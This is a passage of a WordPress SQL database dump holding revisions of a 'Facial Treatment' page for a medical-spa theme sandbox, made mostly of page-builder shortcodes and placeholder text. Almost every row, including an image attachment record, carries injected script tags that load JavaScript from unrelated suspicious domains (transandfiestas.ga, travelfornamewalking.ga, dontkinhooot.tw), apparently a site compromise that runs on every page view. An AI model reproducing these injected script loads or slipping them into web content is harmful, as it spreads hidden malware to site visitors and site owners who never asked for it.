src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:03:27','2018-01-11 01:03:27','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6630,1,'2018-01-11 01:08:39','2018-01-11 01:08:39','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_image=\"https://source.unsplash.com/collection/179646/daily\" bg_position=\"left top\" bg_repeat=\"no-repeat\" bg_color=\"#0a0909\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10%\" bottom_padding=\"10%\" color_overlay=\"#262e38\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_video_lightbox link_style=\"play_button_2\" nectar_play_button_color=\"Default-Accent-Color\" image_url=\"https://source.unsplash.com/800x600\" hover_effect=\"defaut\" box_shadow=\"none\" border_radius=\"none\" play_button_size=\"default\" video_url=\"https://www.youtube.com/watch?v=6oTurM7gESE\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color=\"#3454ff\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Salient can elevate your business to new heights. Separated they live in Bookmarksgrove right at the coast of the Semantic.\" font_container=\"tag:h2|font_size:26|text_align:left|color:%23ffffff|line_height:36px\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:400%20regular%3A400%3Anormal\"][divider line_type=\"No Line\" custom_height=\"20\"][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:08:39','2018-01-11 01:08:39','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6631,1,'2018-01-11 01:09:16','2018-01-11 01:09:16','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:09:16','2018-01-11 01:09:16','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6632,1,'2018-01-11 01:11:16','2018-01-11 01:11:16','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\"]\r\n<h3>4D Laser Face Lifting</h3>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:11:16','2018-01-11 01:11:16','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6633,1,'2018-01-11 01:11:51','2018-01-11 01:11:51','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\"]\r\n<h4>4D Laser Face Lifting</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:11:51','2018-01-11 01:11:51','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6634,1,'2018-01-11 01:13:17','2018-01-11 01:13:17','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','IMG_8407','','inherit','open','closed','','img_8407','','','2018-01-11 01:13:17','2018-01-11 01:13:17','',6269,'http://sandbox.futuremediatrix.com/medikpro/wp-content/uploads/2018/01/IMG_8407.jpg',0,'attachment','image/jpeg',0),(6635,1,'2018-01-11 01:13:25','2018-01-11 01:13:25','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6634\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"120\" link_url=\"http://sandbox.futuremediatrix.com/medikpro/facial-treatment-2/\" link_text=\"More Information\"]\r\n<h4>4D Laser Face Lifting</h4>\r\nLorem ipsum dolor sit amet[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:13:25','2018-01-11 01:13:25','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6636,1,'2018-01-11 01:13:50','2018-01-11 01:13:50','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" 